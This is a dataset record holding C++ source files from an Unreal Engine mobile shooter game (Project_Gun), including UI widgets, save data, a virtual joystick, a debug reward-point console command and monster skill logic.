"pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetShopWeaponSlot.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE(FOnItemBuyWeapon);\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetShopWeaponSlot : public UUserWidget\n{\n\tGENERATED_BODY()\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION()\n\tvoid UpdateLayout();\n\tUFUNCTION()\n\tvoid SetUnlockLayout(bool bUnlock);\n\tUFUNCTION()\n\tvoid SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex, int32 nSlotIndex);\n\tUFUNCTION()\n\tvoid SetWepaon(int32 nPrice);\n\tUFUNCTION()\n\tvoid SetPowerLevel(int32 nPowerLevel, int32 nPrice);\n\tUFUNCTION()\n\tvoid SetAmmoLevel(int32 nAmmoLevel, int32 nPrice);\n\tUFUNCTION()\n\tvoid ShowBuyPopupBox(enum EBuyType ekBuyType, FString kTitle, FString kDescription, int32 nPrice);\n\tUFUNCTION()\n\tvoid ShowMessageBox(FString kTitle, FString kDescription, int32 nValue);\n\nprotected :\n\t// 무기 언락 요청\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnWeapon();\n\t// 파워 레벨업 요청\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnPower();\n\t// 탄약 확장 요청\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnAmmo();\n\n\tUFUNCTION()\n\tvoid OnBuyOK(int32 nValue);\n\tUFUNCTION()\n\tvoid OnBuyCancel(int32 nValue);\n\tUFUNCTION()\n\tvoid OnMessagePopupBoxClose();\n\t\npublic:\n\tFOnItemBuyWeapon OnItemBuyWeapon;\n\nprotected :\n\t// Weapon\n\tPG_WIDGET_DECLAR(UButton, BtnWeapon);\n\tPG_WIDGET_DECLAR(UImage, ImgWeaponLock);\n\tPG_WIDGET_DECLAR(UTextBlock, TextWeaponPrice);\n\tPG_WIDGET_DECLAR(UCanvasPanel, CanvasWeaponPrice);\n\t\n\n\t// Power\n\tPG_WIDGET_DECLAR(UButton, BtnPower);\n\tPG_WIDGET_DECLAR(UTextBlock, TextPowerLevel);\n\tPG_WIDGET_DECLAR(UTextBlock, TextPowerPrice);\n\tPG_WIDGET_DECLAR(UCanvasPanel, CanvasPowerPrice);\n\n\t// Ammo\n\tPG_WIDGET_DECLAR(UButton, BtnAmmo);\n\tPG_WIDGET_DECLAR(UTextBlock, TextAmmoLevel);\n\tPG_WIDGET_DECLAR(UTextBlock, TextAmmoPrice);\n\tPG_WIDGET_DECLAR(UCanvasPanel, CanvasAmmoPrice);\n\nprivate :\n\tint32 m_nSlotIndex = PG_INVALID_INDEX;\n\tint32 m_nWeaponIndex = PG_INVALID_INDEX;\n\tint32 m_nPowerLevel = PG_INVALID_INDEX;\n\tint32 m_nAmmoLevel = PG_INVALID_INDEX;\n\tbool m_bIsMaxPower = false;\n\tbool m_bIsMaxAmmo = false;\n\tbool m_bIsAbleBuyWepaon = false;\n\tbool m_bIsAbleBuyPower = false;\n\tbool m_bIsAbleBuyAmmo = false;\n\n\tUPROPERTY()\n\tTWeakObjectPtr<class APG_GameModeBase>\tm_pGameMode;\n\n\t// 임시 작업\n\tUPROPERTY()\n\tclass UPG_UserWidgetBuyPopup* m_pUserWidgetBuyPopup = nullptr;\n\tUPROPERTY()\n\tclass UPG_UserWidgetMessagePopup* m_pUserWidgetMessagePopup = nullptr;\n};\n" }, { "alpha_fraction": 0.7372803092002869, "alphanum_fraction": 0.7483811378479004, "avg_line_length": 23.56818199157715, "blob_id": "884bb94cb8ccc54f577f8974cf3b33b831eb20db", "content_id": "adc01b9c1ba4f8e8630fd599cd5c65c1763985d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1207, "license_type": "no_license", "max_line_length": 79, "num_lines": 44, "path": "/Source/Project_Gun/Public/SaveData/PG_SavePlayerData.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/SaveGame.h>\n#include \"PG_SavePlayerData.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_SavePlayerData : public USaveGame\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tUPG_SavePlayerData();\n\n\t// 마지막으로 플레이한 스테이지 ID\n\tUPROPERTY(VisibleAnywhere, Category = \"PG StageData\")\n\tint32 m_nLastPlayStageID;\n\n\t// 보유중인 포인트\n\tUPROPERTY(VisibleAnywhere, Category = \"PG StageData\")\n\tint32 m_nRewardPoint;\n\n\t// 3번째 무기 슬롯 확장 여부 (유료로 확장 가능)\n\tUPROPERTY(VisibleAnywhere, Category = \"PG PlayerData\")\n\tbool m_bExtendWeaponSlot;\n\n\t// 현재 장착중인 무기 정보 (최대 3개), TArray<PG_MAX_WEAPON_SLOT>\n\tUPROPERTY(VisibleAnywhere, Category = \"PG PlayerData\")\n\tTArray<int32> m_kEquipWeaponTableIndex;\n\n\t// 구매하여 소유중인 무기 정보, TMap<WeaponTableIndex, FPGWeaponOwnData>\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\")\n\tTMap<int32, struct FPGWeaponOwnData> WeaponOwnData;\n\t\npublic :\n\tstatic FString GetSlotName();\n\tstatic int32 GetPlayerIndex();\n};\n" }, { "alpha_fraction": 0.8065434098243713, "alphanum_fraction": 0.8065434098243713, "avg_line_length": 28.33333396911621, "blob_id": "51dff09fee06d843a07909c6f60da4b569509c99", "content_id": "0d1daab772ca6b7e54ad47eb6df9e9ebe442b8e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 705, "license_type": "no_license", "max_line_length": 97, "num_lines": 24, "path": "/Source/Project_Gun/Public/UI/PG_VirtualJoystick.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Widgets/Input/SVirtualJoystick.h>\n\nclass SPG_VirtualJoystick : public SVirtualJoystick\n{\n\npublic:\n\tSLATE_USER_ARGS(SPG_VirtualJoystick)\n\t{}\n\tSLATE_END_ARGS()\n\n\tvirtual void Construct(const FArguments& InArgs);\n\tvirtual FReply OnTouchStarted(const FGeometry& MyGeometry, const FPointerEvent& Event) override;\n\tvirtual FReply OnTouchMoved(const FGeometry& MyGeometry, const FPointerEvent& Event) override;\n\tvirtual FReply OnTouchEnded(const FGeometry& MyGeometry, const FPointerEvent& Event) override;\n\n\tvoid BindPlayerController(class APG_PlayerController* NewPlayerController);\n\nprivate :\n\tclass APG_PlayerController* MyPlayerController;\n};" }, { "alpha_fraction": 0.7534818649291992, "alphanum_fraction": 0.7548746466636658, "avg_line_length": 23.355932235717773, "blob_id": "4a84da051e36680d84dbbcfb932ad3c99588f192", "content_id": "bbea6d78a4c4165cd8817f1c7437ad0c1eebf2ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1438, "license_type": "no_license", "max_line_length": 99, "num_lines": 59, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_CommandShowMeTheMoney.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n#include \"Game/Console/Commands/PG_CommandShowMeTheMoney.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\nPG_CommandShowMeTheMoney::PG_CommandShowMeTheMoney()\n{\n}\n\nPG_CommandShowMeTheMoney::~PG_CommandShowMeTheMoney()\n{\n}\n\n\nvoid PG_CommandShowMeTheMoney::UpdateCommand()\n{\n\tif (bOnCommand)\n\t{\n\t\tbOnCommand = false;\n\t\tExcute();\n\t}\n}\n\nvoid PG_CommandShowMeTheMoney::Excute()\n{\n\tABCHECK(nullptr != G_PGWorld);\n\tABCHECK(nullptr != m_pConsoleVariable);\n\n\tint32 nRewardPoint = m_pConsoleVariable->GetInt();\n\n\tauto pGameMdoeBase = Cast<APG_GameModeBase>(G_PGWorld->GetAuthGameMode());\n\tif (nullptr == pGameMdoeBase)\n\t{\n\t\tABLOG(Warning, TEXT(\"Can only be used in stage play.\"));\n\t\treturn;\n\t}\n\n\tauto pSavePlayerData = pGameMdoeBase->GetSavePlayerData();\n\tABCHECK(nullptr != pSavePlayerData);\n\n\tpSavePlayerData->m_nRewardPoint = nRewardPoint;\n\tpGameMdoeBase->SavePlayerData();\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(G_PGWorld->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tif (false == pMyPlayerState->InitPlayerData())\n\t{\n\t\tABLOG(Error, TEXT(\"InitPlayerData Error\"));\n\t}\n}\n\nvoid PG_CommandShowMeTheMoney::OnChangeCommand()\n{\n\tABCHECK(nullptr != m_pConsoleVariable);\n\tbOnCommand = true;\n}" }, { "alpha_fraction": 0.7543520331382751, "alphanum_fraction": 0.7543520331382751, "avg_line_length": 18.148147583007812, "blob_id": "3f2a4006607425ecb88bd247ca9dd42b63a4f060", "content_id": "32417aa42d72d920f9b246e64393366b9ff209d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 519, "license_type": "no_license", "max_line_length": 79, "num_lines": 27, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetSkillSlot.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetSkillSlot.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetSkillSlot : public UUserWidget\n{\n\tGENERATED_BODY()\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tvoid SetEnable(bool bEnalbe);\n\nprotected :\n\tPG_WIDGET_DECLAR(UButton, BtnSkill);\n\tPG_WIDGET_DECLAR(UOverlay, OverlayLightBox);\n};\n" }, { "alpha_fraction": 0.7835178375244141, "alphanum_fraction": 0.7933579087257385, "avg_line_length": 24.40625, "blob_id": "3ea47125e8af2295dc1ed91ac6197bc206e7fe4d", "content_id": "9ef654f4ec655589b107d94fd86e9cb9b7b67ab7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1684, "license_type": "no_license", "max_line_length": 79, "num_lines": 64, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetWeaponBox.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetWeaponBox.generated.h\"\n\n\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnBtnWeaponClicked_WeaponIndex, int32);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnBtnWeaponClicked_SlotIndex, int32);\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetWeaponBox : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetSlotIndex(int32 nSlotIndex);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetAmmo(int32 nAmmo);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetEnable(bool bEnable);\n\tvoid SetEnableLightBox(bool bEnable);\n\n\tUFUNCTION(BlueprintCallable)\n\tint32 GetWeaponIndex()\t\t{ return WeaponIndex;\t}\n\npublic :\n\t// Weapon 버튼을 누르면 설정된 WeaponIndex를 전달한다.\n\tFOnBtnWeaponClicked_WeaponIndex OnBtnWeaponClicked_WeaponIndex;\n\n\t// Weapon 버튼을 누르면 장착된 SlotIndex를 전달한다.\n\tFOnBtnWeaponClicked_SlotIndex OnBtnWeaponClicked_SlotIndex;\n\nprivate :\n\tUFUNCTION()\n\tvoid OnBtnWeaponClicked();\n\nprotected :\n\tPG_WIDGET_DECLAR(UButton, Btn_Weapon);\n\tPG_WIDGET_DECLAR(UImage, Img_IconAmmo);\n\tPG_WIDGET_DECLAR(UTextBlock, Text_Ammo);\n\tPG_WIDGET_DECLAR(UOverlay, OverlayLightBox);\n\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 WeaponIndex = PG_INVALID_INDEX;\n\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 SlotIndex = PG_INVALID_INDEX;\n\nprivate :\n\tUPROPERTY()\n\tTWeakObjectPtr<class APG_GameModeBase>\tm_pGameMode;\n};\n" }, { "alpha_fraction": 0.7915006875991821, "alphanum_fraction": 0.7981407642364502, "avg_line_length": 31.06382942199707, "blob_id": "ce81c39fed3654a98b1d990b7cf69b771367725f", "content_id": "ba773d8ca3fa7cad7e76fd7ff3ecc0cc0b91f4d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1508, "license_type": "no_license", "max_line_length": 141, "num_lines": 47, "path": "/Source/Project_Gun/Private/UI/PG_VirtualJoystick.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#include \"UI/PG_VirtualJoystick.h\"\n#include \"Player/PlayerController/PG_PlayerController.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n\nvoid SPG_VirtualJoystick::Construct(const FArguments& InArgs)\n{\n\tState = State_Inactive;\n\tbVisible = true;\n\tbPreventReCenter = false;\n\n\t// just set some defaults\n\tActiveOpacity = 1.0f;\n\tInactiveOpacity = 0.1f; \n\tTimeUntilDeactive = 0.5f;\n\tTimeUntilReset = 2.0f;\n\tActivationDelay = 0.f;\n\tCurrentOpacity = InactiveOpacity;\n\tStartupDelay = 0.f; \n\n\t// listen for displaymetrics changes to reposition controls\n\tFSlateApplication::Get().GetPlatformApplication()->OnDisplayMetricsChanged().AddSP(this, &SPG_VirtualJoystick::HandleDisplayMetricsChanged);\n}\n\nFReply SPG_VirtualJoystick::OnTouchStarted(const FGeometry& MyGeometry, const FPointerEvent& Event)\n{\n\treturn SVirtualJoystick::OnTouchStarted(MyGeometry, Event);\n}\n\nFReply SPG_VirtualJoystick::OnTouchMoved(const FGeometry& MyGeometry, const FPointerEvent& Event)\n{\n\treturn SVirtualJoystick::OnTouchMoved(MyGeometry, Event);\n}\n\nFReply SPG_VirtualJoystick::OnTouchEnded(const FGeometry& MyGeometry, const FPointerEvent& Event)\n{\n\tauto pMyPlayerState = MyPlayerController->GetPlayerState<APG_MyPlayerState>();\n\tif (pMyPlayerState)\n\t\tpMyPlayerState->TryUseTheSkill();\n\n\treturn SVirtualJoystick::OnTouchEnded(MyGeometry, Event);\n}\n\nvoid SPG_VirtualJoystick::BindPlayerController(class APG_PlayerController* NewPlayerController)\n{\n\tABCHECK(nullptr != NewPlayerController);\n\tMyPlayerController = NewPlayerController;\n}" }, { "alpha_fraction": 0.7845394611358643, "alphanum_fraction": 0.7861841917037964, "avg_line_length": 26.0222225189209, "blob_id": "9ac3a10872b76ddfcf95b31ecb2fbdab6e11aaf5", "content_id": "6e356d2111731b957b8c1a6280c79f44625c4b4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1218, "license_type": "no_license", "max_line_length": 181, "num_lines": 45, "path": "/Source/Project_Gun/Public/BlueScriptObject/Target/PG_TargetSpot.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/Actor.h>\n#include \"PG_TargetSpot.generated.h\"\n\n\nUCLASS()\nclass PROJECT_GUN_API APG_TargetSpot : public AActor\n{\n\tGENERATED_BODY()\n\t\npublic:\t\n\t// Sets default values for this actor's properties\n\tAPG_TargetSpot();\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\npublic:\t\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid OnGateOpen();\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid OnGateClose();\n\npublic :\n\tUPROPERTY(VisibleAnywhere, Category = \"PG TriggerBox\")\n\tUBoxComponent* Trigger;\n\n\tUPROPERTY(VisibleAnywhere, Category = \"PG TriggerBox\")\n\tUStaticMeshComponent* Box;\n\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG TriggerBox\")\n\tUParticleSystemComponent*\tPortalEffect;\n\t\nprivate :\n\tUFUNCTION()\n\tvoid OnPlayerOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromSweep, const FHitResult& SweepResult);\n};\n" }, { "alpha_fraction": 0.5955581665039062, "alphanum_fraction": 0.5955581665039062, "avg_line_length": 27.516666412353516, "blob_id": "be1fa3342accb8d1589fea3319c4eede25f9c9f5", "content_id": "f7cde4ea15ef29e5c718a9e11a159de0e2bf165c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1917, "license_type": "no_license", "max_line_length": 83, "num_lines": 60, "path": "/Source/Project_Gun/Public/Player/PlayerController/PG_PlayerController.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/PlayerController.h>\n#include \"PG_PlayerController.generated.h\"\n\n\n/**\n * PlayerController : 플레이어의 행동 관련하여 처리하도록 한다.\n * 클라이언트 느낌\n-. 키입력을 받아 처리\n-. UI 처리에 하기에 좋다\n-. 틱마다 검사하는 일을 구현하기 좋다\n */\nUCLASS()\nclass PROJECT_GUN_API APG_PlayerController : public APlayerController\n{\n\tGENERATED_BODY()\n\t\npublic:\n\tAPG_PlayerController();\n\n\tvirtual void CreateTouchInterface() override;\t\t// 조이스틱의 터치 이벤트를 컨트롤하기 위한 override\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void OnPossess(APawn* aPawn) override;\n\nprotected:\n\tvirtual void BeginPlay() override;\n\tvirtual void SetupInputComponent() override;\n\npublic :\n\t//==========================================================\n\t// Player Input 처리\n\t//==========================================================\n\tUFUNCTION(BlueprintCallable, Category = \"PG TouchInterface\")\n\tvoid SetLockJoystickInput(bool a_bLock);\n\n\t//==========================================================\n\t// Player 행동 처리\n\t//==========================================================\n\tvoid OnFire();\t\t\t// 무기 발사\n\tvoid OnStateClear();\t// 스테이지 클리어 성공\n\tvoid OnStateFailed();\t// 스테이지 클리어 실패\n\nprotected:\n\t//==========================================================\n\t// UI\n\t//==========================================================\n\t//UPROPERTY()\n\t//class UPG_UserWidgetPlayStage* UserWidgetPlayStage;\n\tUPROPERTY()\n\tclass UPG_UserWidgetScreenPlayStage* m_pUserWidgetScreenPlayStage;\n\tUPROPERTY()\n\tclass UPG_UserWidgetScreenStageClear* m_pWidgetStageClear;\n\tUPROPERTY()\n\tclass UPG_UserWidgetScreenStageFailed* m_pUserWidgetScreenStageFailed;\n};\n" }, { "alpha_fraction": 0.730659008026123, "alphanum_fraction": 0.730659008026123, "avg_line_length": 15.619047164916992, "blob_id": "c14c8faabb3ce33ac1b1e322b91b698aece14c72", "content_id": "4883eb063185ce955aa357e25b970bd524829072", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 351, "license_type": "no_license", "max_line_length": 79, "num_lines": 21, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_WeaponGrenadeLauncher.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n\n#include \"PG_WeaponGrenadeLauncher.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_WeaponGrenadeLauncher : public APG_Weapon\n{\n\tGENERATED_BODY()\n\t\n\t\n\t\n\t\n};\n" }, { "alpha_fraction": 0.7670235633850098, "alphanum_fraction": 0.7734475135803223, "avg_line_length": 27.487804412841797, "blob_id": "bd31dd682975a0e9732e9a67568d5d49521cbd77", "content_id": "1da7f1a61c094230a9f82d77dd89fbec4b0c24cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2345, "license_type": "no_license", "max_line_length": 120, "num_lines": 82, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetPlayStageWeaponBag.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetPlayStageWeaponBag.h\"\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\nvoid UPG_UserWidgetPlayStageWeaponBag::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK_TArray(UPG_UserWidgetWeaponBox, WB_WeaponSlot, eMaxWeaponSlot);\n\n\tfor (auto WeaponSlot : m_pkWB_WeaponSlot)\n\t{\n\t\tif (WeaponSlot)\n\t\t\tWeaponSlot->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetPlayStageWeaponBag::OnBtnWeaponSlotClicked);\n\t}\n}\n\nbool UPG_UserWidgetPlayStageWeaponBag::SetSlotWaponIndex(int32 nSlotIndex, int32 nWeaponIndex)\n{\n\tABCHECK(nSlotIndex < m_pkWB_WeaponSlot.Num(), false);\n\tABCHECK(nullptr != m_pkWB_WeaponSlot[nSlotIndex], false);\n\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase, false);\n\n\tm_pkWB_WeaponSlot[nSlotIndex]->SetSlotIndex(nSlotIndex);\n\tm_pkWB_WeaponSlot[nSlotIndex]->SetWeaponIndex(pGameModeBase, nWeaponIndex);\n\n\treturn true;\n}\n\nbool UPG_UserWidgetPlayStageWeaponBag::SetSlotWeaponAmmo(int32 nSlotIndex, int32 nAmmo)\n{\n\tABCHECK(nSlotIndex < m_pkWB_WeaponSlot.Num(), false);\n\tABCHECK(nullptr != m_pkWB_WeaponSlot[nSlotIndex], false);\n\n\tm_pkWB_WeaponSlot[nSlotIndex]->SetAmmo(nAmmo);\n\n\treturn true;\n}\n\nbool UPG_UserWidgetPlayStageWeaponBag::SetEnableSlot(int32 nSlotIndex, bool bEnable)\n{\n\tABCHECK(nSlotIndex < m_pkWB_WeaponSlot.Num(), false);\n\tABCHECK(nullptr != m_pkWB_WeaponSlot[nSlotIndex], false);\n\n\tm_pkWB_WeaponSlot[nSlotIndex]->SetEnable(bEnable);\n\n\treturn true;\n}\n\nvoid UPG_UserWidgetPlayStageWeaponBag::SetEnableLightBox(int32 nSlotIndex)\n{\n\tint nIndex = 0;\n\tfor (auto WeaponSlot : m_pkWB_WeaponSlot)\n\t{\n\t\tif (WeaponSlot)\n\t\t{\n\t\t\tbool bEnable = (nIndex == nSlotIndex);\n\t\t\tWeaponSlot->SetEnableLightBox(bEnable);\n\t\t}\n\n\t\tnIndex++;\n\t}\n}\n\nvoid UPG_UserWidgetPlayStageWeaponBag::OnBtnWeaponSlotClicked(int32 nSlotIndex)\n{\n\tABCHECK(nSlotIndex < m_pkWB_WeaponSlot.Num());\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\t// 무기 변경\n\tABCHECK(pMyPlayerState->ChangeWeapon(nSlotIndex, m_pkWB_WeaponSlot[nSlotIndex]->GetWeaponIndex()));\n\n\tSetEnableLightBox(nSlotIndex);\n}" }, { "alpha_fraction": 0.772695779800415, "alphanum_fraction": 0.772695779800415, "avg_line_length": 24.76785659790039, "blob_id": "c5f48eb262cb4b7202969f561827deb17834d6f3", "content_id": "561359aed86c35592b75aec77cd8292b19416829", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1489, "license_type": "no_license", "max_line_length": 94, "num_lines": 56, "path": "/Source/Project_Gun/Public/Character/PG_Char.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_CharDefine.h\"\n\n#include <GameFramework/Character.h>\n#include \"PG_Char.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_Char : public ACharacter\n{\n\tGENERATED_BODY()\n\npublic:\n\t// Sets default values for this character's properties\n\tAPG_Char();\n\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void Destroyed() override;\n\t// 액터가 월드 밖으로 나갔을 때 Call (Kill Z)\n\tvirtual void FellOutOfWorld(const class UDamageType & dmgType) override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\n\n\t// Called to bind functionality to input\n\tvirtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;\n\n\tbool AssetLoadCharacter(FString AssetPath);\n\n\t// 발사 처리\n\tUFUNCTION()\n\tvirtual void Fire();\n\n\t\nprotected :\n\tUFUNCTION()\n\tvirtual void OnAssetLoadCharacterCompleted();\n\nprotected :\n\tTSharedPtr<struct FStreamableHandle> AssetStreamingHandle;\n\t\nprotected:\n\tUPROPERTY(VisibleAnywhere, Category = \"PG UI\", Meta = (AllowPrivateAccess = true))\n\tclass UWidgetComponent* HPBarWidget = nullptr;\t\t// Debug HPBar\n\n\t// 캐릭터 그림자\n\tUPROPERTY(VisibleAnywhere, Category = \"PG CharacterShadowInfo\")\n\tclass UStaticMeshComponent* CharacterShadowComponent;\n};\n" }, { "alpha_fraction": 0.7660398483276367, "alphanum_fraction": 0.7714601755142212, "avg_line_length": 28.258899688720703, "blob_id": "fcf666f07a1009d9d36df8cb1147a8dde98e3b70", "content_id": "287d4c0d648f91547f1dd28f609f8d4f317fd9f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9392, "license_type": "no_license", "max_line_length": 194, "num_lines": 309, "path": "/Source/Project_Gun/Private/Character/PG_MonCharSkillType.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonCharSkillType.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/Component/PG_ComponentWeapon.h\"\n#include \"Character/Component/PG_ComponentDash.h\"\n#include \"Character/Component/PG_ComponentDivisionSpawn.h\"\n#include \"AI/PG_AICon_Mon.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n\n#include <Engine/BlockingVolume.h>\n#include <DrawDebugHelpers.h>\n\nAPG_MonCharSkillType::APG_MonCharSkillType()\n{\n\tPrimaryActorTick.bCanEverTick = true;\n\n\tAIControllerClass = APG_AICon_Mon::StaticClass();\n\n\tWeaponComponent = CreateDefaultSubobject<UPG_ComponentWeapon>(TEXT(\"PROJECTILEFIRECOMPONENT\"));\n\tDashComponent = CreateDefaultSubobject<UPG_ComponentDash>(TEXT(\"DASHCOMPONENT\"));\n\tPreviewMeshComponent = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"PREVIEWMESHCOMPONENT\"));\n\tPreviewMeshComponent->SetupAttachment(GetMesh());\n\tPreviewMeshComponent->SetVisibility(false);\n\tDivisionSpawnComponent = CreateDefaultSubobject<UPG_ComponentDivisionSpawn>(TEXT(\"COMPONENTDIVISIONSPAWN\"));\n}\n\nvoid APG_MonCharSkillType::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tif (m_bEquipWeapon)\n\t\tUpdateWeaponSystem();\n\n\tif (m_bEquipDash)\n\t\tUpdateDashSystem();\n}\n\nvoid APG_MonCharSkillType::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tif (WeaponComponent)\n\t{\n\t\tm_bEquipWeapon = WeaponComponent->IsEquipWeapon();\n\t\tif (m_bEquipWeapon)\n\t\t{\n\t\t\t// 스테이지 시작시 플레이어가 몬스터 사정권에 있으면 바로 총알이 날아가버리므로,\n\t\t\t// 난이도 밸런스를 위해 시작시 스킬 쿨타임을 바로 적용한다.\n\t\t\tm_bCanWeaponFire = 